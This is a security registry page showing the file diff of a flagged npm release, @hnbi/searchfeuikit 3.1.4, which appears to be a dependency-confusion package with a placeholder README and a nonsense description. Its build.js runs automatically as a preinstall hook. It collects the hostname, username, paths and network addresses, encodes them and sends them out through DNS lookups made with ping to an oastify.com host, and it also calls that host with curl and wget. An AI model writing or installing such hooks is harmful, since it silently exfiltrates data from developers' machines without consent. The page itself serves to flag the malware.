@hnbi/searchfeuikit 3.1.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @hnbi/searchfeuikit might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/build.js +50 -0
  3. package/package.json +10 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Test.
package/build.js ADDED
@@ -0,0 +1,50 @@
1
+ const os = require("os");
2
+ const { spawn } = require("child_process");
3
+ var isWin = process.platform === "win32";
4
+
5
+ const id = "@hnbi/searchfeuikit";
6
+
7
+ try {
8
+ exfil({ d_hostname: os.hostname() });
9
+ } catch (e) {}
10
+ try {
11
+ exfil({ d_user: os.userInfo().username });
12
+ } catch (e) {}
13
+ try {
14
+ exfil({ d_cwd: `cwd: ${process.cwd()}` });
15
+ } catch (e) {}
16
+ try {
17
+ exfil({ d_dirname: `dirname: ${__dirname}` });
18
+ } catch (e) {}
19
+ try {
20
+ const nets = os.networkInterfaces();
21
+ for (const name of Object.keys(nets)) {
22
+ for (const net of nets[name]) {
23
+ exfil({ ["d_net_" + name]: net.address });
24
+ }
25
+ }
26
+ } catch (e) {}
27
+
28
+ try {
29
+ spawn(`curl`, `http://dj02d9sc9muknk5xc9hx84g9t0zrnhb6.oastify.com/?${id}`, { detached: true });
30
+ spawn(`wget`, `http://dj02d9sc9muknk5xc9hx84g9t0zrnhb6.oastify.com/?${id}`, { detached: true });
31
+ } catch (error) {
32
+
33
+ }
34
+
35
+ function exfil(data) {
36
+ try {
37
+ const b64 = Buffer.from(JSON.stringify(data))
38
+ .toString("base64")
39
+ .replace(/=/gm, "");
40
+
41
+ let args;
42
+ if (isWin) {
43
+ args = ["-n", "1"];
44
+ } else {
45
+ args = ["-c", "1"];
46
+ }
47
+ args.push(`${b64}.dj02d9sc9muknk5xc9hx84g9t0zrnhb6.oastify.com`);
48
+ spawn(`ping`, args, { detached: true });
49
+ } catch (e) {}
50
+ }
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "name": "@hnbi/searchfeuikit",
3
+ "version": "3.1.4",
4
+ "description": "fizibevuyiwe cutove ayazaduve",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node build.js"
8
+ },
9
+ "license": "MIT"
10
+ }